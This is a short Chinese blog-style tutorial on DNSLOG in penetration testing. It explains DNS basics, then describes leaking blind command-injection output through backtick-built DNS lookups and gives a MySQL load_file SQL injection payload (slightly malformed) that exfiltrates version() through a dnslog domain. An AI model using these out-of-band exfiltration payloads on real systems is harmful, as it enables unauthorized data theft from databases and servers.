DNSLOG在滲透測試中的玩法兒


首先了解一下DNS是啥???

  DNS(Domain Name System,域名系統),萬維網上作為域名和IP地址相互映射的一個分布式數據庫,能夠使用戶更方便的訪問互聯網,而不用去記住能夠被機器直接讀取的IP數串。通過域名,最終得到該域名對應的IP地址的過程叫做域名解析(或主機名解析)。DNS協議運行在UDP協議之上,使用端口號53。在RFC文檔中RFC 2181對DNS有規范說明,RFC 2136對DNS的動態更新進行說明,RFC 2308對DNS查詢的反向緩存進行說明。簡單的說就是一個翻譯系統,把域名翻譯成IP的一個系統。

那么顧名思義DNSLOG就是專門記錄DNS的日志的咯。

你每訪問一遍域名,DNSLOG都會記錄下來。

這里拿土司的做演示案例:

t00ls.6296ab741e9180de941dcdcb1ca2d088.tu4.org

首先我先ping一下這個域名44吶。

可以發現一個問題,就是他把t00ls給記錄了。

那么問題來了。他記錄這個有啥好處呢????

假設現在有一個命令執行啥的。但是看不到返回結果,是不是可以通過這個進行?比如linux中的反引號是可以進行命令執行的,假設可以進行命令注入那么豈不就是也可以使用這個直接進行注入???

還有就是在注入里的時候load_file會自動發送dns查詢,所以可以直接使用load_file讀取到。

select load_file('\\\\',version(),'.dnslog地址')

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM